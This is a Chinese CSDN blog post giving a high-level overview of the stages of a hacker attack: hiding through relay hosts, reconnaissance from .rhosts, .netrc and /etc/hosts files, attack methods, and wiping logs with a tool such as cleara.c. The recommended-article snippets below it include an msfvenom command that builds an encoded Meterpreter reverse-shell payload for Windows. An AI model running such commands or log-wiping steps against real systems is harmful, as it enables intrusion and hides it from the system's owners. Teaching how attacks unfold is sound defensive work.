黑客的一次攻击行为

最新推荐文章于 2023-02-09 10:57:40 发布
最新推荐文章于 2023-02-09 10:57:40 发布
阅读量447 收藏 1
点赞数
分类专栏: 云计算&网络安全知识学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29406309/article/details/104968502
版权

主要由:隐藏自己 -- 预攻击探测 -- 攻击行为 -- 擦除痕迹 四个步骤构成。

 

一般完整的攻击过程都是先隐藏自身,在隐藏好自己后再进行预攻击探测,检测目标机器的各种属性和具备的被攻击条件,然后采取相应的攻击方法进行破坏,达到自己的目的,之后攻击者会删除自己的行为日志。

1 隐藏自己

常见的攻击者隐藏自身的方式有以下几种:

从已经取得控制权的主机上通过telnet或rsh跳跃。

从windows主机上通过wingates等服务进行跳跃。

利用配置不当的代理服务器进行跳跃。

利用电话交换技术先通过拨号找寻并连入某台主机,然后通过这台主机再连入internet来跳跃。

2 预攻击探测

 

    这步的主要任务是收集有关要攻击目标的有用的的信息。这些信息包括目标计算机的硬件信息、目标计算机的用户信息、存在的漏洞等。

 

    通常是从已经攻入的系统中的.rhosts和.netrc文件中将所列的机器挑选出来,从系统的/etc/hosts文件中可以得到一个很全的主机列表。但大多数情况下,选定一个攻击目标是一个比较盲目的过程,除非攻击者有很明确的目的和动机。攻击者也可能找到dns表,通过dns可以知道机器名、ip地址、机器类型、甚至还可以知道机器的主人和单位。

 

3 采取攻击行为

 

    在攻击探测中如果攻击者发现目标机器系统有可以被利用的漏洞或弱点,则立即采取攻击行为。在此过程中具体采用的攻击行为要视目标机器系统而定,目前较流行的手段有暴力破解、缓冲区益出、跨站脚本、拒绝服务、欺骗等。

 

4 清除痕迹

 

    攻击者清除攻击痕迹的方法主要是清除系统和服务日志。有些工具可以清除日志,如THC提供的cleara.c。

最低0.47元/天 解锁文章
喃喃不爱说话
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全数据泄露、黑客攻击、恶意软件传播Stuxnet
06-07
2. **Sony Pictures黑客事件**:2014年,索尼影业遭受了一次大规模的黑客攻击,泄露了大量公司内部文件、电子邮件和电影剧本。这次事件被认为是对电影《黑客帝国》续集的抗议行为,但也揭示了索尼影业在网络安全方面...
入侵过程-入侵阶段介绍(一)预攻击阶段
C_SF_C
02-19 2992
01-入侵过程-入侵阶段介绍(一)预攻击阶段 主要内容 入侵阶段包含:预攻击阶段、攻击阶段、后攻击阶段 预攻击阶段 信息收集 为实施攻击进行的提前探测活动,为后续攻击打下基础 这一阶段收集的信息包括:网络信息(域名、IP地址、网络拓扑)、系统信息(操作系统版本、开放的各种网络服务版本)、用户信息(用户标识、组标识、共享资源、即时通信软件账号、邮件账号)等 信息收集方式 被动收集 被动收集:在其他...
[计网:原理与实践] 第七章:网络安全(课后习题整理)
weixin_46952991的博客
08-11 3960
第七章 网络安全 7-1 举例说明计算机网络可能面临的安全威胁。网络需要哪些安全服务?   预攻击探测:在进行网络攻击前,入侵者想方设法了解该网络中计算机的IP地址、所用操作系统、所运行的程序以及存在的漏洞。使攻击具有针对性。   分组嗅探:利用分组嗅探器接收流经该设备的分组,获取信息。   IP哄骗:若用户对端系统的操作系统拥有绝对控制权,就能将任意IP地址放入数据的源地址字段,伪造源地址的数据包。   TCP劫持:入侵者设法劫持某主机和某服务器之间的TCP连接,从而获取对服务器的全部控制权。   拒绝服
漏洞和网络扫描相关知识
2201_75857869的博客
02-09 310
插件编写规范化后,用户自己都可以编写插件来扩充漏洞扫描软件的功能,这种技术使漏洞扫描软件的升级维护变得相对简单,而专用脚本语言的使用也简化了编写新插件的工作,使漏洞扫描软件具有强的扩展性。漏洞扫描技术的原理是检查目标主机是否存在漏洞,在端口扫描后得知目标主机开启的端口以及端口上的网络服务,将这些相关信息与网络漏洞扫描系统提供的漏洞库进行匹配,查看是否存在满足匹配条件的漏洞,通过模拟黑客攻击手法,对目标主机系统进行攻击性的安全漏洞扫描,若模拟攻击成功,则表明目标主机系统存在安全漏洞。
实时检测攻击行为 9种IDS入侵检测系统方法
KingXai的专栏
11-25 5037
入侵检测系统,英文简写为IDS,顾名思义,它是用来实时检测攻击行为以及报告攻击的。如果把防火墙比作守卫网络大门的门卫的话,那么入侵检测系统(IDS)就是可以主动寻找罪犯的巡警。 因而寻求突破IDS的技术对漏洞扫描、脚本注入、URL攻击等有着非凡的意义,同时也是为了使IDS进一步趋向完善。 Snort是很多人都在用的一个IDS了,其实它也并不是万能的,笔者下面就来谈谈突破诸如Snort这类
信息安全协会第一次会议.zip
最新发布
09-29
【标题】"信息安全协会第一次会议.zip" 涉及到的主要知识点主要集中在网络安全、信息安全教育以及可能的攻防技术分享。这个压缩包包含了几个文件,分别以不同的格式提供了相关的信息。 1. **re.pdf** - 这个文件的...
网络安全攻击技术.pptx
06-09
4、合作的精神 成功的一次入侵和攻击,在目前的形式下,单靠一个人的力量已经没有办法完成了,通常需要数人,数百人的通力协作才能完成任务,互联网提供了不同国家黑客交流合作的平台。 网络安全攻击技术全文共49页...
网络攻击分类及原理工具详解.docx
04-17
实际上黑客实施一次入侵行为,为达到他的攻击目的会结合采用多种攻击手段,在不同的入侵阶段使用不同的方法。因此在这篇攻击方法讨论中我们按照攻击的步骤,逐一讨论在每一步骤中可采用的攻击方法及可利用的攻击工具...
DOS拒绝服务攻击源代码
10-18
但请注意,任何涉及实际攻击行为的行为都是违法的。 8. **安全意识**:了解DOS攻击不仅是技术层面的问题,也关乎网络安全意识的培养,提醒我们在日常网络活动中避免成为攻击者的工具。 9. **法规遵循**:研究此类...
最常见网络攻击详细分析
09-04
最常见网络攻击详细分析:网络攻击步骤、预攻击探测、漏洞扫描(综合扫描)、木马攻击、拒绝服务攻击、欺骗攻击、蠕虫病毒攻击、其他攻击。详细描述请见文档。
攻击行为检测规律
qq_46329726的博客
01-28 5006
使用snort设置rule实现报警检测
使用机器学习异常检测攻击行为
focus on security
12-13 1313
一般现有的内部威胁检测算法都会被转化为异常检测来做,我个人认为在内部威胁检测领域除了异常检测这一killing part之外,识别攻击动机以及区分异常和攻击也是重点(大型立flag现场:另一篇论文中了,我就写这个),首先这篇文章就对现有的异常检测算法做一个综述。 异常检测算法 内部威胁检测主要是基于用户的网络、文件、设备、邮件等审计日志构建正常用户行为模型,之后使用包括图、机器学习、集成学习等方法对当前行为进行异常检测。 •基于机器学习的异常检测方法 使用包括SVM、朴素贝叶斯等方法对用户行为模型.
黑客常见攻击流程
小旺的博客
05-22 7272
黑客一般攻击的流程 第1步:预攻击探测 这一阶段主要为信息收集,收集的信息包括网络信息(域名、IP地址、网络拓扑)、系统信息(操作系统版本、开放的各种网络服务版本)、用户信息(用户标识、组标识、共享资源、即时通信软件账号、邮件账号)等。 收集信息的方法或工具 (1)SNMP协议。用它来查阅非安全路由器的路由表,从而了解目标机构网络拓扑的内部细节。 (2)TraceRoute程序。用它能够得出到达目标主机所要经过的网络数和路由器数。 (3)Whois协议。它是一种信息服务,能够提供有关所有DNS域和负责各
黑客攻击的一般流程
路雪军 Carl
04-15 6244
 一般完整的攻击过程都是先隐藏自身,在隐藏好自己后再进行攻击探测,检测目标机器的各种属性和具备的被攻击条件,然后采取相应的攻击方法进行破坏,达到自己的目的,之后攻击者会删除自己的行为日志。1 隐藏自己常见的攻击者隐藏自身的方式有以下几种: 从已经取得控制权的主机上通过telnet或rsh跳跃。 从windows主机上通过wingates等服务进行跳跃。
学习:一次完整的攻击
sanMu_blog的博客
08-27 2478
完整攻击链大概包括信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清除等七步,虽然这个站点只经历了前四步,但也具有较强的代表性,组合利用漏洞形成攻击连,拿下管理权限。 强烈推荐学习,链接如下: 全程带阻:记一次授权网络攻防演练(上) 全程带阻:记一次授权网络攻防演练(下) ...
常见攻击原理与技术分析
小旺的博客
05-21 1609
黑客攻击原理与技术 黑客的概念 “黑客”一词是英语Hacker的音译,是指拥有高深的计算机及网络知识,能够躲过系统安全控制,进入或破坏计算机系统或网络的非法用户。 攻击发展历程 黑客术语 1.肉鸡 所谓“肉鸡”是一种很形象的比喻。它比喻那些可以随意被攻击者控制的计算机。受害者可以是Windows操作系统,也可以是UNIX/Linux操作系统,可以是普通的个人计算机,也可以是大型的服务器,攻击者可以像操作自己的计算机那样来操作它们,而不被受害者所发觉。 2.木马 木马就是那些表面上正常,但是一旦运行,就会获
一次攻击(mateploit攻击windows 10总结)
九层台
10-26 5003
攻击机:kali2018.3(需要一个metaploit) 受攻击者:windows10(需要关掉杀软,windows自带的也要关掉) 0x01生成 windows $msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \ msfv...
ssh和rsh的区别、Linux rsh命令
热门推荐
愿我如星君如月 ... 夜夜流光相皎洁 ...
03-27 1万+
见:https://blog.csdn.net/blackmanren/article/details/18352147http://www.runoob.com/linux/linux-comm-rsh.htmlssh 和 rsh的区别主要有:1 安全级别不同, 主要是ssh的密码等都是加密传输,而且还有密钥认证的机制, rsh明文传输. 而且没有密钥的机制. 具体,文章一大批2 不用输入密...
DDoS攻击是网络安全的主要威胁之一,请搜集资料,描述一个DDoS攻击事件实例、技术原理和相应对策。
06-10
DDoS(Distributed Denial of Service)攻击是一种利用分布式网络攻击目标服务器或网络资源的攻击方式,其目的是通过消耗目标服务器或网络资源的带宽和计算能力,使其无法正常工作,从而导致服务不可用。下面是一个DDoS攻击事件实例: 2016年10月21日,美国新罕布什尔州的一家公司Dyn遭受了一次规模巨大的DDoS攻击,导致其提供的DNS服务受到瘫痪,数以百万计的用户无法访问互联网上的各种服务。该攻击被认为是有组织的黑客攻击行为攻击流量高峰达到了1.2Tbps,创下了历史纪录。 DDoS攻击的基本原理是利用大量的“僵尸”计算机或网络设备向目标服务器或网络资源发起请求,使其无法正常处理合法用户的请求。攻击的方式多种多样,包括UDP Flood、SYN Flood、ICMP Flood等。 为了应对DDoS攻击,可以采取一些技术对策,包括: 1. 流量过滤:利用防火墙或反向代理等技术,对流量进行过滤和分析,从而过滤掉DDoS攻击流量。 2. 负载均衡:通过负载均衡技术,将请求分散到多台服务器上,从而分摊攻击流量的压力。 3. CDN加速:采用CDN(内容分发网络)技术,将静态内容缓存到全球多个节点上,从而分散攻击流量的压力。 4. 入侵检测:通过入侵检测技术,及时发现并阻止DDoS攻击。 5. 协同防御:通过多种技术协同作战,以提高防御效果,如采用DDoS防护设备、云防护等技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值